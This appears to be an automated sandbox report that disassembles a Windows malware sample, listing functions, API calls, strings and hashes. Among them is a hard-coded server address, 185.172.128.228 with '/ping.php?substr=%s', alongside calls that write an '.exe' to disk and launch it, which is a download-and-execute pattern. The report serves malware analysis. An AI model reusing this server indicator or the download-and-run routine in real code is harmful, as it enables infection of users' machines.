Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 05B86777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 05B867B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 05B867CD
CloseHandle.KERNEL32(?), ref: 05B867D6

Strings

.exe, xrefs: 05B86782

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 2451dc3099debc2c1fdb426e17f2bc690e376c0b95c098c8cd3e3f950b28c1ba
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 31017831E0061CEBDF15EFA9E8459EDBBB8FF08640F008126F801A6260EB709A45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 05B864A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,05B85B74,00000001,?,/ping.php?substr=%s), ref: 05B864C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,05B85B74,00000001,?,/ping.php?substr=%s,?), ref: 05B864DC
CloseHandle.KERNEL32(00000000,?,05B85B74,00000001,?,/ping.php?substr=%s,?), ref: 05B864E5

Strings

.exe, xrefs: 05B864AE

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: ace46fbcd38898fb7e349a495090445aecd852183ed9cae5ee4d80f09f4e277c
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: F7E06572601124BBD7311B999C48FABBE6DEF855B0F040165FB05D21109661DD0197B4

Uniqueness

Uniqueness Score: -1.00%

Function 05B77FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 05B78061
__alldvrm.LIBCMT ref: 05B78262
__alldvrm.LIBCMT ref: 05B78284

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: eedeff43bb275722d90e0209f48da1e1f5b8f8aa16d6068c55cfb54aa5ce765e
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 44A14971A0478A9FDB25CF18C899BBEBFE6FF15350F2441EDE5A59B280C234A941C750

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 05B82AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05B82C05

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: 3841ededa5281681923a3943c88024336dbe28530cb1e0fdd5429c157cd0fe08
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: CF413B39B015496BDB257FB88C88A7EBAAAFF05370F1812E5F438D6290DB34B540D761

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 05B7B567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,05B74002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 05B7B5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05B7B63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05B7B64F
__freea.LIBCMT ref: 05B7B658

Part of subcall function 05B77CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77CDE

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: 06340d571307d4e7138232fa0cd9a1c78ce2e3bc7705e2900585a2ad5747d7d9
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: 3331B072A0020EABDF248F64CC44DAEBBA5FF40610F0401A9ED29D7150EB35ED60CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05B6CF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 05B6CF2B

Part of subcall function 05B6CE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05B6CEA7
Part of subcall function 05B6CE78: ___AdjustPointer.LIBCMT ref: 05B6CEC2

_UnwindNestedFrames.LIBCMT ref: 05B6CF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05B6CF51
CallCatchBlock.LIBVCRUNTIME ref: 05B6CF79

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: d2bd455b9704080d494796c8d644d8ccd30ac2b82d9ce4905e02d23314229af7
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 37012932200109BBCF12AE95CC48EEB7F7AFF99754F044154FE48A6120D73AE861DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05B774BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05B6ED94,00000000,00000000,?,05B77461,05B6ED94,00000000,00000000,00000000,?,05B77719,00000006,0042F348), ref: 05B774EC
GetLastError.KERNEL32(?,05B77461,05B6ED94,00000000,00000000,00000000,?,05B77719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,05B77052), ref: 05B774F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05B77461,05B6ED94,00000000,00000000,00000000,?,05B77719,00000006,0042F348,0042F340,0042F348,00000000), ref: 05B77506

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 1fbc9910f704a99855c7b9d295456594b84a01200cc648066aa5f9d3c86adccd
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: B801F73675522FABD7318F68AC48E667B99FF057A1F500570FA2AD3180DF20E901C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

.A, xrefs: 0041DE13
, xrefs: 0041DE66

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05B6A937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 05B6A96A
__IsNonwritableInCurrentImage.LIBCMT ref: 05B6AA23

Strings

csm, xrefs: 05B6AA0D

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: eb8f3d218fac1231a60dc8738ab7ccacbff2de9a15e1f7ae2b86f1af6adce7b4
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: DC41A034B04249DBCF10DF68C884AAEBBB5FF45318F1481E6E81A6B291C779A955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05B7FFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 05B800D4

Strings

ACP, xrefs: 05B80017
OCP, xrefs: 05B8004D

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: 2123d7cf3fca51a581b0a72074c15e49876d0f62b7ebef69ff521005ed99659a
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 1721C462A4410CAAE734BA54C909FB7726BFB44B90F1695E5E90AD7100F737F908C354

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D

Strings

ACP, xrefs: 0041FDB0
OCP, xrefs: 0041FDE6

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 05B862B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05B862B6

Part of subcall function 05B61E19: __EH_prolog.LIBCMT ref: 05B61E1E

Part of subcall function 05B6266A: __EH_prolog.LIBCMT ref: 05B6266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05B86398

Strings

,jC, xrefs: 05B8638D

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 96cfa0aa3aace3b7ce1ea7dc7a4f773ae76ec4622010d3583d694d77788a6886
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 6A31EBB5E01119EBDB14EF98D995AEDF7B4FF58304F1081AAE405A3640DB74AE08CF61

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 05B637D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05B637DB

Strings

/ping.php?substr=%s, xrefs: 05B637E3
185.172.128.228, xrefs: 05B637E2

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: ab55ff56240711a7d24a344f600b9cc3ff947d0dd5a1044b8b576a70286b3ba7
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 6701CC72A05515ABD704EF98DC44BBEB7B9FF44614F1045AAF809E3240D3B9AA40CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

/ping.php?substr=%s, xrefs: 0040357C
185.172.128.228, xrefs: 0040357B

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 05B7A93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05B7A9D1
GetLastError.KERNEL32 ref: 05B7A9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05B7AA3A

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction ID: 16f2a27f61cc8722539087949540980805dce85b7b7eb9254fc29e965b684b52
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: 2541B83160464EAFCB61CF64C948B7E7BA5FF41310F1541E9F97AA71A0D730A901C751

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u5ek.0.exePID: 3484, Parent PID: 7004COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	41

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,042D4198), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,042D42B8), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,042F06C8), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,042F0728), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,042F06E0), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,042F06F8), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,042EFA48), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,042F0680), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,042F6478), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,042F62C8), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,042F6340), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,042D43F8), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,042D4378), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,042D4618), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,042D45F8), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,042F61F0), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,042F62F8), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,042EF8B8), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,042D43D8), ref: 00416413
